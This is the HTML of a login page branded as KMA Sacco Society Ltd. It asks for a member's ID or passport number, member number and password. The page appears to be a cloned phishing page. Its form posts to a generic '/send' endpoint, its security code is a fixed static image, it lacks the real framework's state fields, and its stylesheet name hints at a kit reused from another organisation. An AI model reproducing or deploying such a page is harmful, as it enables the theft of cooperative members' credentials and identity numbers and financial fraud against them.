<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
      <title>KMA Sacco Society Ltd</title>

    <link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon">
 <link rel="stylesheet" href="/public/css/kemsacss.css">
</head>

<body>
 <form method="post" action="/send" id="form1">

<script src="/WebResource.axd?d=ycGfQT-y6a8yQMJDAhO9HHsLkyCoOGzf03a4TNSCN7xlkiwk5OVU5TxtWNoifIX85jYz0pMOSZLWJIi_0&amp;t=636217758383761366" type="text/javascript"></script>


<script src="/WebResource.axd?d=XD3y3qQ2aJ5o1JYnrvuMBRyPvi6OB7tJO-AGX7cVXE773OMuCScT263fEyG8OY6ChL79ivvQyByWNgOeOfzIfLTU8uw1&amp;t=636217758383761366" type="text/javascript"></script>
<script src="/WebResource.axd?d=Wo-V1JXdkKizrbuBYQGHoZVZNPi4rUuMWRPKZn9kVRuPPlyR_UOV3UIuaH0221lp2VN-gwIVTQQWypUP0&amp;t=636217758383761366" type="text/javascript"></script>

    <div class="login-page">
      <img width="50%" src="/public/img/logokma.png">
  <div class="form">

    
     <div class="errorlbl"> <span id="ContentPlaceHolder1_lblError"></span></div>
      
   
<div class="form">
    
     
        <div class="active " id="login-form">
            <span style="padding:4px; border-radius:1px; font-family:'Trebuchet MS' ">To login, kindly input your credentials below. <br>
        <div class="form-group">
            <span id="ContentPlaceHolder1_lblErrorLogin" class="label label-danger"></span>
        </div>
      <div class="form-group">
           
          <input name="idno" type="text" id="ContentPlaceHolder1_User_No" title="Please enter your ID number" class="form-control" placeholder="Please enter your ID No/ Passport No" autocomplete="off">
      </div>
                <div class="form-group">

           <input name="MemberNo" type="text" id="ContentPlaceHolder1_MemberNo" title="please enter your Member NUmber" class="form-control" placeholder=" Member number - 0xxxx" autocomplete="off">
      </div> 
                
<div class="form-group">
   
          <input name="Pass" type="password" id="ContentPlaceHolder1_txtPass" title="please enter your Member NUmber" class="form-control" placeholder="Please enter your password" autocomplete="off">
</div> 
        <div>
        <div class="form-group">
            <div class="row">
            <div class="col-md-1 text-center">
           <span> <i class="fa fa-2x fa-refresh"></i>.</span>
            </div>
            <div class="col-md-11">
                <div style="background-color:White;"><img src="/public/img/CaptchaImagekma.jfif" border="0" width="200" height="60"></div>
            </div>
            </div></div>

                                
<div class="form-group">
    <input name="CODE" type="text" id="ContentPlaceHolder1_TextBox1" title="Please enter the code above" class="form-control" placeholder="Security Code" autocomplete="off">
            <span id="CODED" title="Code is required." class="failureNotification" style="visibility:hidden;"><span class="ui-state-error"><i class="fa fa-exclamation-circle"></i> Required</span></span>
</div>

                    
</div>
        
         <input type="submit" name="ctl00$ContentPlaceHolder1$LoginButton" value="Login" id="ContentPlaceHolder1_LoginButton" style="background-color: #019749;
    color: #FFF;font-weight: bold; width:70%; border-radius:2px;">
      
      <p class="message" style="font-weight: bold"> <a id="forgot" href="PasswordRecovery.aspx">Forgot Password / Sign up</a> </p>
    </span></div>
    
  </div>
       
 


    </div>
    </div>
   
         
    
<div class="footer small">
    <p>Copyright © 2019 <strong> | </strong>
                    <a target="_New" href="http://www.kmasacco.com/">KMA Sacco Society Ltd</a> <strong>| Reach us through +254 (020) 267 5620, +254 722 519037  | </strong>
                        
             <b>Powered By </b>
                      <a href="http://www.coretec.co.ke" target="_New">Coretec Systems and Solutions</a></p>
</div>
     
<script type="text/javascript">
//<![CDATA[
var Page_Validators =  new Array(document.getElementById("ContentPlaceHolder1_RequiredFieldValidator1"));
//]]>
</script>

<script type="text/javascript">
//<![CDATA[
var ContentPlaceHolder1_RequiredFieldValidator1 = document.all ? document.all["ContentPlaceHolder1_RequiredFieldValidator1"] : document.getElementById("ContentPlaceHolder1_RequiredFieldValidator1");
ContentPlaceHolder1_RequiredFieldValidator1.controltovalidate = "ContentPlaceHolder1_TextBox1";
ContentPlaceHolder1_RequiredFieldValidator1.errormessage = "Code is required.";
ContentPlaceHolder1_RequiredFieldValidator1.validationGroup = "RecoveryUserValidationGroup";
ContentPlaceHolder1_RequiredFieldValidator1.evaluationfunction = "RequiredFieldValidatorEvaluateIsValid";
ContentPlaceHolder1_RequiredFieldValidator1.initialvalue = "";
//]]>
</script>


<script type="text/javascript">
//<![CDATA[

var Page_ValidationActive = false;
if (typeof(ValidatorOnLoad) == "function") {
    ValidatorOnLoad();
}

function ValidatorOnSubmit() {
    if (Page_ValidationActive) {
        return ValidatorCommonOnSubmit();
    }
    else {
        return true;
    }
}
        WebForm_AutoFocus('ContentPlaceHolder1_User_No');//]]>
</script>
</form>
<script src="Vendors/jquery/dist/jquery.min.js"></script>
<script src="Vendors/build/js/index.js"></script>



</body></html>